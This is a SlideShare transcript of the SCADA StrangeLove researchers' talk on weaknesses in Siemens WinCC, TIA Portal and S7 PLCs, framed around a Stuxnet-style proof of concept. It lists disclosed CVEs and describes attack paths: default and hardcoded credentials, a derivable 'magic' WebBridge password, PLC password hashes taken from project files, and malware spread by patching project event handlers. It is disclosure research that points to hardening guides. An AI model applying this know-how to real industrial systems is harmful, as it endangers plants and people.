All pictures are taken fromDr StrangeLove movie
 Group of security researchers focused on ICS/SCADAto save Humanity from industrial disaster and tokeep Purity Of Essence...
 Goalsto automate security assessment of ICSplatforms and environment Objectivesto understand systemto assess built-in s...
 Goalto create PoC of Stuxnet-style attack Initial conditionscommon ICS components and configurationcommon ICS security ...
 Engineering tools STEP 7 PCS7 TIA PORTAL SCADA/HMI WinCC (Windows) WinCC Flexible/Advanced (Windows/Win CE) S7 fa...
 WinCC Server Windows/MSSQL based SCADA WinCC Client (HMI) WinCC runtime + Project + OPC WinCC Web Server (WebNavigat...
1 2 9 7 610 1114 1773100 968999413528581010020030040050060070080090010001997 1998 1999 2000 2001 2002 2003 2004 2005 2006 ...
 Cyber Weapon Tactics, Techniques, and Procedures (TTPs) APT1 APT 2.0 Cyber Kill Chain
 ChinJa (R) (tm) Breaking through Harvesting Creeping death Chaos
That is a question!
http://bit.ly/RI6FtQhttp://bit.ly/UXn7d1
http://www.surfpatrol.ru/en/report
 A lot of “WinCCed” IE fromcountries/companies/industries Special prize to guys from US forWinCC 6.X at 2012
 XPath Injection (CVE-2012-2596) Path Traversal (CVE-2012-2597) XSS ~ 20 Instances (CVE-2012-2595)Fixed in Update 2 for...
 Lot of XSS and CSRF CVE-2012-3031 CVE-2012-3028 Lot of arbitrary file reading CVE-2012-3030 SQL injection over SOAP...
 Path Traversal CVE-2013-0679 Buffer overflow in ActiveX CVE-2013-0674 XXE OOB CVE-2013-0677 Missing encryption of ...
 Network-level Active scan S7, Modbus, MSSQL (WinCC Instance), HTTP(S) SNMP (public/private hardcoded for PLC and HMIP...
Dmitry Efanovhttp://scadastrangelove.blogspot.ru/2012/11/plcscan.html
Alexander TimorinPHDays III release
 PdlRt.exe – graphic runtime CCRtsLoader.EXE – loader s7otbxsx.exe – network Inter process communication: RPC Sectio...
 Detecting active project:HKCUSoftwareSIEMENSWINCCControlCenterDefault Settings LastOpenPath LastProject Detecting MS ...
• {Hostname}_{Project}_TLG*• TAG data• СС_{Project}_{Timestamp}*• Project data and configuration• Users, PLCs, Privileges
• Managed by UM app• Stored in dbo.PW_USER
CVE-2013-0676
• Administrator:ADMINISTRATOR• Avgur2 > Avgur
This is myencryptionkey
 Select from MS SQL via COM objects “Special” Windows Account Shortcuts**we don’t know yet, you know
Authenticationvia SQL-storedaccountsServerID magic toget WebBridgepasswordMagic is used forSCSWebBridgeX
Too hard for me…
Oh! En/c(r)ypt[10]n!ServerID = Base64(RC2(pass, key)), were key= MD5(dll hardcode)
Not my department password!
 All other confections use WNUSR forauthentication For authorization ID parameter is used
Not yet…
 «Magic» password = MD5(WNUSR_DC92D7179E29.Password) WNUSR_DC92D7179E29.Password generated during installation Stored i...
 WinCC clients use hardcoded account tocommunicate with OPC Web bridge Password for WNUSR_DC92D7179E29 generatedduring i...
…responsible disclosure
 What is Project? Collection of ActiveX/COM/.NET objects Event Handlers and other code (C/VB) Configuration files, XML...
 NO! Project itself is dynamic code It’s easy to patch it “on the fly” Vulnerabilities in data handlers(CVE-2013-0677)...
 Hardcoded SNMP community string (unfixed) Hardcoded S7 PLC CA certificate (Dmitry Sklarov)http://scadastrangelove.blogs...
 Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) ...
 Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) ...
 SHA-1 stored in PLC project files It can be intercepted duringfirmware update/project upload It can be extracted from ...
 Buffer overflow CVE-2013-0669 Cross-Site Scripting CVE-2013-0672/CVE-2013-0670/CVE-2013-0668 Directory traversal/Res...
 Profinet scanner WinCC Harvester 2.0http://scadastrangelove.blogspot.com/search/label/Releases
 TIA portal Security Hardening Guide S7 protocol password brute force tool and JtR Simatic WinCC Security Hardening Gui...
All pictures are taken fromDr StrangeLove movie
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Scada strange love.
Upcoming SlideShare
Loading in …5
×

Scada strange love.

1,172
-1

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,172
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Scada strange love.

  1. 1. All pictures are taken fromDr StrangeLove movie
  2. 2.  Group of security researchers focused on ICS/SCADAto save Humanity from industrial disaster and tokeep Purity Of EssenceSergey Gordeychik Gleb Gritsai Denis BaranovRoman Ilin Ilya Karpov Sergey BobrovArtem Chaykin Yuriy Dyachenko Sergey DrozdovDmitry Efanov Yuri Goltsev Vladimir KochetkovAndrey Medov Sergey Scherbel Timur YunusovAlexander Zaitsev Dmitry Serebryannikov Dmitry NagibinDmitry Sklyarov Alexander Timorin Vyacheslav EgoshinRoman Ilin Alexander Tlyapov
  3. 3.  Goalsto automate security assessment of ICSplatforms and environment Objectivesto understand systemto assess built-in security featuresto create security audit/hardening guidesto automate processVulnerabilities – waste production
  4. 4.  Goalto create PoC of Stuxnet-style attack Initial conditionscommon ICS components and configurationcommon ICS security toolsonly ICS components weaknessvulnerabilities by SCADA StrangeLove team
  5. 5.  Engineering tools STEP 7 PCS7 TIA PORTAL SCADA/HMI WinCC (Windows) WinCC Flexible/Advanced (Windows/Win CE) S7 family PLC Old line (200, 300, 400) New line (1200, 1500)
  6. 6.  WinCC Server Windows/MSSQL based SCADA WinCC Client (HMI) WinCC runtime + Project + OPC WinCC Web Server (WebNavigator) IIS/MSSQL/ASP/ASP.NET/SOAP WinCC WebClient (HMI) ActiveX/HTML/JS
  7. 7. 1 2 9 7 610 1114 1773100 968999413528581010020030040050060070080090010001997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013
  8. 8.  Cyber Weapon Tactics, Techniques, and Procedures (TTPs) APT1 APT 2.0 Cyber Kill Chain
  9. 9.  ChinJa (R) (tm) Breaking through Harvesting Creeping death Chaos
  10. 10. That is a question!
  11. 11. http://bit.ly/RI6FtQhttp://bit.ly/UXn7d1
  12. 12. http://www.surfpatrol.ru/en/report
  13. 13.  A lot of “WinCCed” IE fromcountries/companies/industries Special prize to guys from US forWinCC 6.X at 2012
  14. 14.  XPath Injection (CVE-2012-2596) Path Traversal (CVE-2012-2597) XSS ~ 20 Instances (CVE-2012-2595)Fixed in Update 2 for WinCC V7.0 SP3http://support.automation.siemens.com/WW/view/en/60984587
  15. 15.  Lot of XSS and CSRF CVE-2012-3031 CVE-2012-3028 Lot of arbitrary file reading CVE-2012-3030 SQL injection over SOAP CVE-2012-3032 Username and password disclosure via ActiveXabuse CVE-2012-3034Fixed in Update 3 for WinCC V7.0 SP3http://support.automation.siemens.com/WW/view/en/63472422
  16. 16.  Path Traversal CVE-2013-0679 Buffer overflow in ActiveX CVE-2013-0674 XXE OOB CVE-2013-0677 Missing encryption of sensitive data CVE-2013-0678 Improper authorization CVE-2013-0676fFixed in WinCC 7.2/SIMATIC PCS7 V8.0 SP 1http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-714398.pdf
  17. 17.  Network-level Active scan S7, Modbus, MSSQL (WinCC Instance), HTTP(S) SNMP (public/private hardcoded for PLC and HMIPanels) Passive scan Profinet Host-level WinCC forensic
  18. 18. Dmitry Efanovhttp://scadastrangelove.blogspot.ru/2012/11/plcscan.html
  19. 19. Alexander TimorinPHDays III release
  20. 20.  PdlRt.exe – graphic runtime CCRtsLoader.EXE – loader s7otbxsx.exe – network Inter process communication: RPC Sections (memory mapped files) BaseNamedObjectsTCPSharedMm and otherinteresting stuff
  21. 21.  Detecting active project:HKCUSoftwareSIEMENSWINCCControlCenterDefault Settings LastOpenPath LastProject Detecting MS SQL database name (timestamp)ArchiveManagerAlarmLoggingArchiveManagerTagLogging*Obtaining information from database and systemobjects
  22. 22. • {Hostname}_{Project}_TLG*• TAG data• СС_{Project}_{Timestamp}*• Project data and configuration• Users, PLCs, Privileges
  23. 23. • Managed by UM app• Stored in dbo.PW_USER
  24. 24. CVE-2013-0676
  25. 25. • Administrator:ADMINISTRATOR• Avgur2 > Avgur
  26. 26. This is myencryptionkey
  27. 27.  Select from MS SQL via COM objects “Special” Windows Account Shortcuts**we don’t know yet, you know
  28. 28. Authenticationvia SQL-storedaccountsServerID magic toget WebBridgepasswordMagic is used forSCSWebBridgeX
  29. 29. Too hard for me…
  30. 30. Oh! En/c(r)ypt[10]n!ServerID = Base64(RC2(pass, key)), were key= MD5(dll hardcode)
  31. 31. Not my department password!
  32. 32.  All other confections use WNUSR forauthentication For authorization ID parameter is used
  33. 33. Not yet…
  34. 34.  «Magic» password = MD5(WNUSR_DC92D7179E29.Password) WNUSR_DC92D7179E29.Password generated during installation Stored in registry via DPAPI Good length and chartset but…
  35. 35.  WinCC clients use hardcoded account tocommunicate with OPC Web bridge Password for WNUSR_DC92D7179E29 generatedduring installation and probably strong MD5(WNUSR_.Password) stored with DPAPIprotection “Encrypted” password for WNUSR_DC* can beobtained by request to WinCCWebBridge.dll WNUSR_DC92D7179E29 is only account used forwork with Windows/Database
  36. 36. …responsible disclosure
  37. 37.  What is Project? Collection of ActiveX/COM/.NET objects Event Handlers and other code (C/VB) Configuration files, XML and other Can Project be trusted? Ways to spread malware with Project?
  38. 38.  NO! Project itself is dynamic code It’s easy to patch it “on the fly” Vulnerabilities in data handlers(CVE-2013-0677) How to abuse? Simplest way – to patch eventhandlers
  39. 39.  Hardcoded SNMP community string (unfixed) Hardcoded S7 PLC CA certificate (Dmitry Sklarov)http://scadastrangelove.blogspot.com/2012/09/all-your-plc-belong-to-us.html Multiple vulnerabilities in S7 1200 PLC Webinterface (Dmitriy Serebryannikov, Artem Chaikin, YuryGoltsev, Timur Yunusov)http://www.siemens.com/corporatetechnology/pool/de/forschungsfelder/siemens_security_advisory_ssa-279823.pdf
  40. 40.  Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) Server (PLC) provide 20 byte challenge Client calculate HMAC-SHA1(challenge, SHA1(password) asresponse
  41. 41.  Can be protected by password Authentication – simple challenge-response Password hashed (SHA1) on client (TIAPortal) Server (PLC) provide 20 byte challenge Client calculate HMAC-SHA1(challenge, SHA1(password)) asresponse
  42. 42.  SHA-1 stored in PLC project files It can be intercepted duringfirmware update/project upload It can be extracted from project fileSHA-1(pass)VSHMAC-SHA1(challenge, SHA1(pass))
  43. 43.  Buffer overflow CVE-2013-0669 Cross-Site Scripting CVE-2013-0672/CVE-2013-0670/CVE-2013-0668 Directory traversal/Response splitting CVE-2013-0671 Server-side script injection CVE-2012-3032Fixed in WinCC (TIA Portal) V12http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-212483.pdf
  44. 44.  Profinet scanner WinCC Harvester 2.0http://scadastrangelove.blogspot.com/search/label/Releases
  45. 45.  TIA portal Security Hardening Guide S7 protocol password brute force tool and JtR Simatic WinCC Security Hardening Guide PLCScan tool ICS/SCADA/PLC Google/Shodan CheatSheet SCADA Safety in Numbershttp://scadastrangelove.blogspot.com/search/label/Releases
  46. 46. All pictures are taken fromDr StrangeLove movie

×